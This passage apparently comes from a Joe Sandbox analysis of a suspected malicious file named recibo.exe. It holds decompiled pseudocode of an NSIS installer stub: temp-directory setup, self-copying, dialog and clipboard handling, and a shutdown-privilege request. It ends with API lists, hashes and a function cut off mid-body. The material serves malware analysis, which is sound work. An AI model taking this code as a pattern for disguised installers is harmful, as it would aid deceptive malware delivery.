                                                                                  								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
                                                                                  								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
                                                                                  									goto L29;
                                                                                  								}
                                                                                  								_t178 =  *((intOrPtr*)(_t199 + 8));
                                                                                  								__eflags = _t178 - 0x20;
                                                                                  								if(_t178 == 0x20) {
                                                                                  									L28:
                                                                                  									_t36 =  &_v20;
                                                                                  									 *_t36 = _v20 | 0x00000004;
                                                                                  									__eflags =  *_t36;
                                                                                  									goto L29;
                                                                                  								}
                                                                                  								__eflags = _t178 - _t189;
                                                                                  								if(_t178 != _t189) {
                                                                                  									goto L29;
                                                                                  								}
                                                                                  								goto L28;
                                                                                  							}
                                                                                  							_t179 =  *((intOrPtr*)(_t199 + 2));
                                                                                  							__eflags = _t179 - _t210;
                                                                                  							if(_t179 == _t210) {
                                                                                  								L23:
                                                                                  								 *0x434fa0 = 1;
                                                                                  								goto L24;
                                                                                  							}
                                                                                  							__eflags = _t179 - _t189;
                                                                                  							if(_t179 != _t189) {
                                                                                  								goto L24;
                                                                                  							}
                                                                                  							goto L23;
                                                                                  						}
                                                                                  					} else {
                                                                                  						goto L16;
                                                                                  					}
                                                                                  					do {
                                                                                  						L16:
                                                                                  						_t199 = _t199 + 2;
                                                                                  						__eflags =  *_t199 - _t210;
                                                                                  					} while ( *_t199 == _t210);
                                                                                  					goto L17;
                                                                                  				}
                                                                                  				goto L37;
                                                                                  			}
                                                                                  0x00403a57
                                                                                  0x00403a57
                                                                                  0x00000000
                                                                                  0x0040398a
                                                                                  0x0040398a
                                                                                  0x0040398c
                                                                                  0x0040398d
                                                                                  0x00403996
                                                                                  0x0040398f
                                                                                  0x0040398f
                                                                                  0x0040398f
                                                                                  0x0040399c
                                                                                  0x004039a4
                                                                                  0x004039ab
                                                                                  0x004039b3
                                                                                  0x004039b3
                                                                                  0x004039c0
                                                                                  0x004039cc
                                                                                  0x004039d6
                                                                                  0x004039d6
                                                                                  0x004039d8
                                                                                  0x004039df
                                                                                  0x004039e9
                                                                                  0x004039f5
                                                                                  0x004039fb
                                                                                  0x00403a01
                                                                                  0x00403a04
                                                                                  0x00403a0e
                                                                                  0x00403a14
                                                                                  0x00403a16
                                                                                  0x00403a1a
                                                                                  0x00403a2b
                                                                                  0x00403a31
                                                                                  0x00403a36
                                                                                  0x00403a38
                                                                                  0x00403a3b
                                                                                  0x00403a41
                                                                                  0x00403a41
                                                                                  0x00403a38
                                                                                  0x00403a16
                                                                                  0x00403a44
                                                                                  0x00403a4b
                                                                                  0x00403a4b
                                                                                  0x00403a4b
                                                                                  0x00403a4b
                                                                                  0x00403a52
                                                                                  0x00000000
                                                                                  0x00403a52
                                                                                  0x00403984
                                                                                  0x00403908
                                                                                  0x0040390b
                                                                                  0x0040390f
                                                                                  0x00403914
                                                                                  0x00403916
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403922
                                                                                  0x0040392d
                                                                                  0x00403932
                                                                                  0x00000000
                                                                                  0x00403932
                                                                                  0x004038b0
                                                                                  0x004038c8
                                                                                  0x004038d9
                                                                                  0x004038da
                                                                                  0x004038de
                                                                                  0x004038e0
                                                                                  0x004038ee
                                                                                  0x004038f5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004038f5
                                                                                  0x004038f7
                                                                                  0x00000000
                                                                                  0x004038f7
                                                                                  0x0040381a
                                                                                  0x00403826
                                                                                  0x0040382b
                                                                                  0x00403830
                                                                                  0x00403832
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040383a
                                                                                  0x00403842
                                                                                  0x00403853
                                                                                  0x0040385b
                                                                                  0x0040385d
                                                                                  0x00403862
                                                                                  0x00403864
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403864
                                                                                  0x00000000
                                                                                  0x004037c1
                                                                                  0x0040376a
                                                                                  0x0040376c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040376e
                                                                                  0x00403772
                                                                                  0x00403776
                                                                                  0x0040377d
                                                                                  0x0040377d
                                                                                  0x0040377d
                                                                                  0x0040377d
                                                                                  0x00000000
                                                                                  0x0040377d
                                                                                  0x00403778
                                                                                  0x0040377b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040377b
                                                                                  0x00403714
                                                                                  0x00403718
                                                                                  0x0040371b
                                                                                  0x00403722
                                                                                  0x00403722
                                                                                  0x00000000
                                                                                  0x00403722
                                                                                  0x0040371d
                                                                                  0x00403720
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00403720
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004036ee
                                                                                  0x004036ee
                                                                                  0x004036ef
                                                                                  0x004036f0
                                                                                  0x004036f0
                                                                                  0x00000000
                                                                                  0x004036ee
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                                                                                  • GetVersionExW.KERNEL32(?), ref: 00403579
                                                                                  • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                                                                  • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                                                                  • OleInitialize.OLE32(00000000), ref: 0040366A
                                                                                  • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                                                                  • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                                                                  • CharNextW.USER32(00000000,00440000,00000020,00440000,00000000), ref: 004036D6
                                                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                                                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                                                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
                                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                                                                  • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                                                                                    • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                                                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00441800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00440000,00000000,?), ref: 0040397C
                                                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                                                                  • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                                                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\recibo.exe,0042AA28,00000001), ref: 00403A0E
                                                                                  • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                                                                                  • OleUninitialize.OLE32(?), ref: 00403A5E
                                                                                  • ExitProcess.KERNEL32 ref: 00403A78
                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                                                                  • ExitProcess.KERNEL32 ref: 00403B0C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                  • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\recibo.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                  • API String ID: 3859024572-507065716
                                                                                  • Opcode ID: 7a788a85b9786d5a7ebd132106c546d121407ab0fc20c65c93ef4011eb75cbdd
                                                                                  • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                                                                  • Opcode Fuzzy Hash: 7a788a85b9786d5a7ebd132106c546d121407ab0fc20c65c93ef4011eb75cbdd
                                                                                  • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 143 4056de-4056f9 144 405888-40588f 143->144 145 4056ff-4057c6 GetDlgItem * 3 call 4044ce call 404e27 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405891-4058b3 GetDlgItem CreateThread CloseHandle 144->147 148 4058b9-4058c6 144->148 163 4057e4-4057e7 145->163 164 4057c8-4057e2 SendMessageW * 2 145->164 147->148 149 4058e4-4058ee 148->149 150 4058c8-4058ce 148->150 154 4058f0-4058f6 149->154 155 405944-405948 149->155 152 4058d0-4058df ShowWindow * 2 call 4044ce 150->152 153 405909-405912 call 404500 150->153 152->149 167 405917-40591b 153->167 159 4058f8-405904 call 404472 154->159 160 40591e-40592e ShowWindow 154->160 155->153 157 40594a-405950 155->157 157->153 165 405952-405965 SendMessageW 157->165 159->153 168 405930-405939 call 40559f 160->168 169 40593e-40593f call 404472 160->169 170 4057f7-40580e call 404499 163->170 171 4057e9-4057f5 SendMessageW 163->171 164->163 172 405a67-405a69 165->172 173 40596b-405996 CreatePopupMenu call 40657a AppendMenuW 165->173 168->169 169->155 182 405810-405824 ShowWindow 170->182 183 405844-405865 GetDlgItem SendMessageW 170->183 171->170 172->167 180 405998-4059a8 GetWindowRect 173->180 181 4059ab-4059c0 TrackPopupMenu 173->181 180->181 181->172 184 4059c6-4059dd 181->184 185 405833 182->185 186 405826-405831 ShowWindow 182->186 183->172 187 40586b-405883 SendMessageW * 2 183->187 188 4059e2-4059fd SendMessageW 184->188 189 405839-40583f call 4044ce 185->189 186->189 187->172 188->188 190 4059ff-405a22 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 405a24-405a4b SendMessageW 190->192 192->192 193 405a4d-405a61 GlobalUnlock SetClipboardData CloseClipboard 192->193 193->172
                                                                                  C-Code - Quality: 96%
                                                                                  			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                  				struct HWND__* _v8;
                                                                                  				long _v12;
                                                                                  				struct tagRECT _v28;
                                                                                  				void* _v36;
                                                                                  				signed int _v40;
                                                                                  				int _v44;
                                                                                  				int _v48;
                                                                                  				signed int _v52;
                                                                                  				int _v56;
                                                                                  				void* _v60;
                                                                                  				void* _v68;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				struct HWND__* _t94;
                                                                                  				long _t95;
                                                                                  				int _t100;
                                                                                  				int _t101;
                                                                                  				long _t104;
                                                                                  				void* _t108;
                                                                                  				intOrPtr _t119;
                                                                                  				void* _t127;
                                                                                  				intOrPtr _t130;
                                                                                  				struct HWND__* _t134;
                                                                                  				int _t156;
                                                                                  				int _t159;
                                                                                  				struct HMENU__* _t164;
                                                                                  				struct HWND__* _t168;
                                                                                  				struct HWND__* _t169;
                                                                                  				int _t171;
                                                                                  				void* _t172;
                                                                                  				short* _t173;
                                                                                  				short* _t175;
                                                                                  				int _t177;
                                                                                  
                                                                                  				_t169 =  *0x433ee4; // 0x10442
                                                                                  				_t156 = 0;
                                                                                  				_v8 = _t169;
                                                                                  				if(_a8 != 0x110) {
                                                                                  					__eflags = _a8 - 0x405;
                                                                                  					if(_a8 == 0x405) {
                                                                                  						_t127 = CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                                                  						CloseHandle(_t127); // executed
                                                                                  					}
                                                                                  					__eflags = _a8 - 0x111;
                                                                                  					if(_a8 != 0x111) {
                                                                                  						L17:
                                                                                  						_t171 = 1;
                                                                                  						__eflags = _a8 - 0x404;
                                                                                  						if(_a8 != 0x404) {
                                                                                  							L25:
                                                                                  							__eflags = _a8 - 0x7b;
                                                                                  							if(_a8 != 0x7b) {
                                                                                  								goto L20;
                                                                                  							}
                                                                                  							_t94 = _v8;
                                                                                  							__eflags = _a12 - _t94;
                                                                                  							if(_a12 != _t94) {
                                                                                  								goto L20;
                                                                                  							}
                                                                                  							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                                                  							__eflags = _t95 - _t156;
                                                                                  							_a8 = _t95;
                                                                                  							if(_t95 <= _t156) {
                                                                                  								L36:
                                                                                  								return 0;
                                                                                  							}
                                                                                  							_t164 = CreatePopupMenu();
                                                                                  							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                                                  							_t100 = _a16;
                                                                                  							__eflags = _a16 - 0xffffffff;
                                                                                  							_t159 = _a16 >> 0x10;
                                                                                  							if(_a16 == 0xffffffff) {
                                                                                  								GetWindowRect(_v8,  &_v28);
                                                                                  								_t100 = _v28.left;
                                                                                  								_t159 = _v28.top;
                                                                                  							}
                                                                                  							_t101 = TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156);
                                                                                  							__eflags = _t101 - _t171;
                                                                                  							if(_t101 == _t171) {
                                                                                  								_v60 = _t156;
                                                                                  								_v48 = 0x42d268;
                                                                                  								_v44 = 0x1000;
                                                                                  								_a4 = _a8;
                                                                                  								do {
                                                                                  									_a4 = _a4 - 1;
                                                                                  									_t104 = SendMessageW(_v8, 0x1073, _a4,  &_v68);
                                                                                  									__eflags = _a4 - _t156;
                                                                                  									_t171 = _t171 + _t104 + 2;
                                                                                  								} while (_a4 != _t156);
                                                                                  								OpenClipboard(_t156);
                                                                                  								EmptyClipboard();
                                                                                  								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                                                  								_a4 = _t108;
                                                                                  								_t172 = GlobalLock(_t108);
                                                                                  								do {
                                                                                  									_v48 = _t172;
                                                                                  									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                                                  									 *_t173 = 0xd;
                                                                                  									_t175 = _t173 + 2;
                                                                                  									 *_t175 = 0xa;
                                                                                  									_t172 = _t175 + 2;
                                                                                  									_t156 = _t156 + 1;
                                                                                  									__eflags = _t156 - _a8;
                                                                                  								} while (_t156 < _a8);
                                                                                  								GlobalUnlock(_a4);
                                                                                  								SetClipboardData(0xd, _a4);
                                                                                  								CloseClipboard();
                                                                                  							}
                                                                                  							goto L36;
                                                                                  						}
                                                                                  						__eflags =  *0x433ecc - _t156; // 0x0
                                                                                  						if(__eflags == 0) {
                                                                                  							ShowWindow( *0x434f08, 8);
                                                                                  							__eflags =  *0x434f8c - _t156;
                                                                                  							if( *0x434f8c == _t156) {
                                                                                  								_t119 =  *0x42c240; // 0x5bcfcc
                                                                                  								E0040559F( *((intOrPtr*)(_t119 + 0x34)), _t156);
                                                                                  							}
                                                                                  							E00404472(_t171);
                                                                                  							goto L25;
                                                                                  						}
                                                                                  						 *0x42ba38 = 2;
                                                                                  						E00404472(0x78);
                                                                                  						goto L20;
                                                                                  					} else {
                                                                                  						__eflags = _a12 - 0x403;
                                                                                  						if(_a12 != 0x403) {
                                                                                  							L20:
                                                                                  							return E00404500(_a8, _a12, _a16);
                                                                                  						}
                                                                                  						ShowWindow( *0x433ed0, _t156);
                                                                                  						ShowWindow(_t169, 8);
                                                                                  						E004044CE(_t169);
                                                                                  						goto L17;
                                                                                  					}
                                                                                  				}
                                                                                  				_v52 = _v52 | 0xffffffff;
                                                                                  				_v40 = _v40 | 0xffffffff;
                                                                                  				_t177 = 2;
                                                                                  				_v60 = _t177;
                                                                                  				_v56 = 0;
                                                                                  				_v48 = 0;
                                                                                  				_v44 = 0;
                                                                                  				asm("stosd");
                                                                                  				asm("stosd");
                                                                                  				_t130 =  *0x434f10;
                                                                                  				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                                                  				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                                                  				 *0x433ed0 = GetDlgItem(_a4, 0x403);
                                                                                  				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
                                                                                  				_t134 = GetDlgItem(_a4, 0x3f8);
                                                                                  				 *0x433ee4 = _t134;
                                                                                  				_v8 = _t134;
                                                                                  				E004044CE( *0x433ed0);
                                                                                  				 *0x433ed4 = E00404E27(4);
                                                                                  				 *0x433eec = 0;
                                                                                  				GetClientRect(_v8,  &_v28);
                                                                                  				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                                                  				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                                                                                  				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                                                  				if(_a8 >= 0) {
                                                                                  					SendMessageW(_v8, 0x1001, 0, _a8);
                                                                                  					SendMessageW(_v8, 0x1026, 0, _a8);
                                                                                  				}
                                                                                  				if(_a12 >= _t156) {
                                                                                  					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                                                  				}
                                                                                  				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                  				_push(0x1b);
                                                                                  				E00404499(_a4);
                                                                                  				if(( *0x434f18 & 0x00000003) != 0) {
                                                                                  					ShowWindow( *0x433ed0, _t156);
                                                                                  					if(( *0x434f18 & 0x00000002) != 0) {
                                                                                  						 *0x433ed0 = _t156;
                                                                                  					} else {
                                                                                  						ShowWindow(_v8, 8);
                                                                                  					}
                                                                                  					E004044CE( *0x433ec8);
                                                                                  				}
                                                                                  				_t168 = GetDlgItem(_a4, 0x3ec);
                                                                                  				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                                                  				if(( *0x434f18 & 0x00000004) != 0) {
                                                                                  					SendMessageW(_t168, 0x409, _t156, _a12);
                                                                                  					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                                                  				}
                                                                                  				goto L36;
                                                                                  			}






































                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,00000403), ref: 0040573C
                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                                                                  • GetClientRect.USER32(?,?), ref: 00405788
                                                                                  • GetSystemMetrics.USER32(00000002), ref: 0040578F
                                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                                                                                  • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040575A
                                                                                    • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040589E
                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 004058B3
                                                                                  • ShowWindow.USER32(00000000), ref: 004058D7
                                                                                  • ShowWindow.USER32(00010442,00000008), ref: 004058DC
                                                                                  • ShowWindow.USER32(00000008), ref: 00405926
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                                                  • CreatePopupMenu.USER32 ref: 0040596B
                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
                                                                                  • GetWindowRect.USER32(?,?), ref: 0040599F
                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                                                  • OpenClipboard.USER32(00000000), ref: 00405A00
                                                                                  • EmptyClipboard.USER32 ref: 00405A06
                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405A1C
                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
                                                                                  • CloseClipboard.USER32 ref: 00405A61
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                  • String ID: {
                                                                                  • API String ID: 590372296-366298937
                                                                                  • Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                                  • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                                                  • Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                                  • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 95%
                                                                                  			E71541BFF() {
                                                                                  				signed int _v8;
                                                                                  				signed int _v12;
                                                                                  				signed int _v16;
                                                                                  				signed int _v20;
                                                                                  				WCHAR* _v24;
                                                                                  				WCHAR* _v28;
                                                                                  				signed int _v32;
                                                                                  				signed int _v36;
                                                                                  				signed int _v40;
                                                                                  				signed int _v44;
                                                                                  				WCHAR* _v48;
                                                                                  				signed int _v52;
                                                                                  				void* _v56;
                                                                                  				intOrPtr _v60;
                                                                                  				WCHAR* _t208;
                                                                                  				signed int _t211;
                                                                                  				void* _t213;
                                                                                  				void* _t215;
                                                                                  				WCHAR* _t217;
                                                                                  				void* _t225;
                                                                                  				struct HINSTANCE__* _t226;
                                                                                  				struct HINSTANCE__* _t227;
                                                                                  				struct HINSTANCE__* _t229;
                                                                                  				signed short _t231;
                                                                                  				struct HINSTANCE__* _t234;
                                                                                  				struct HINSTANCE__* _t236;
                                                                                  				void* _t237;
                                                                                  				intOrPtr* _t238;
                                                                                  				void* _t249;
                                                                                  				signed char _t250;
                                                                                  				signed int _t251;
                                                                                  				void* _t255;
                                                                                  				struct HINSTANCE__* _t257;
                                                                                  				void* _t258;
                                                                                  				signed int _t260;
                                                                                  				signed int _t261;
                                                                                  				signed short* _t264;
                                                                                  				signed int _t269;
                                                                                  				signed int _t272;
                                                                                  				signed int _t274;
                                                                                  				void* _t277;
                                                                                  				void* _t281;
                                                                                  				struct HINSTANCE__* _t283;
                                                                                  				signed int _t286;
                                                                                  				void _t287;
                                                                                  				signed int _t288;
                                                                                  				signed int _t300;
                                                                                  				signed int _t301;
                                                                                  				signed short _t304;
                                                                                  				void* _t305;
                                                                                  				signed int _t309;
                                                                                  				signed int _t312;
                                                                                  				signed int _t315;
                                                                                  				signed int _t316;
                                                                                  				signed int _t317;
                                                                                  				signed short* _t321;
                                                                                  				WCHAR* _t322;
                                                                                  				WCHAR* _t324;
                                                                                  				WCHAR* _t325;
                                                                                  				struct HINSTANCE__* _t326;
                                                                                  				void* _t328;
                                                                                  				signed int _t331;
                                                                                  				void* _t332;
                                                                                  
                                                                                  				_t283 = 0;
                                                                                  				_v32 = 0;
                                                                                  				_v36 = 0;
                                                                                  				_v16 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_v40 = 0;
                                                                                  				_t332 = 0;
                                                                                  				_v52 = 0;
                                                                                  				_v44 = 0;
                                                                                  				_t208 = E715412BB();
                                                                                  				_v24 = _t208;
                                                                                  				_v28 = _t208;
                                                                                  				_v48 = E715412BB();
                                                                                  				_t321 = E715412E3();
                                                                                  				_v56 = _t321;
                                                                                  				_v12 = _t321;
                                                                                  				while(1) {
                                                                                  					_t211 = _v32;
                                                                                  					_v60 = _t211;
                                                                                  					if(_t211 != _t283 && _t332 == _t283) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_t286 =  *_t321 & 0x0000ffff;
                                                                                  					_t213 = _t286 - _t283;
                                                                                  					if(_t213 == 0) {
                                                                                  						_t37 =  &_v32;
                                                                                  						 *_t37 = _v32 | 0xffffffff;
                                                                                  						__eflags =  *_t37;
                                                                                  						L20:
                                                                                  						_t215 = _v60 - _t283;
                                                                                  						if(_t215 == 0) {
                                                                                  							__eflags = _t332 - _t283;
                                                                                  							 *_v28 = _t283;
                                                                                  							if(_t332 == _t283) {
                                                                                  								_t255 = GlobalAlloc(0x40, 0x1ca4); // executed
                                                                                  								_t332 = _t255;
                                                                                  								 *(_t332 + 0x1010) = _t283;
                                                                                  								 *(_t332 + 0x1014) = _t283;
                                                                                  							}
                                                                                  							_t287 = _v36;
                                                                                  							_t47 = _t332 + 8; // 0x8
                                                                                  							_t217 = _t47;
                                                                                  							_t48 = _t332 + 0x808; // 0x808
                                                                                  							_t322 = _t48;
                                                                                  							 *_t332 = _t287;
                                                                                  							_t288 = _t287 - _t283;
                                                                                  							__eflags = _t288;
                                                                                  							 *_t217 = _t283;
                                                                                  							 *_t322 = _t283;
                                                                                  							 *(_t332 + 0x1008) = _t283;
                                                                                  							 *(_t332 + 0x100c) = _t283;
                                                                                  							 *(_t332 + 4) = _t283;
                                                                                  							if(_t288 == 0) {
                                                                                  								__eflags = _v28 - _v24;
                                                                                  								if(_v28 == _v24) {
                                                                                  									goto L42;
                                                                                  								}
                                                                                  								_t328 = 0;
                                                                                  								GlobalFree(_t332);
                                                                                  								_t332 = E715413B1(_v24);
                                                                                  								__eflags = _t332 - _t283;
                                                                                  								if(_t332 == _t283) {
                                                                                  									goto L42;
                                                                                  								} else {
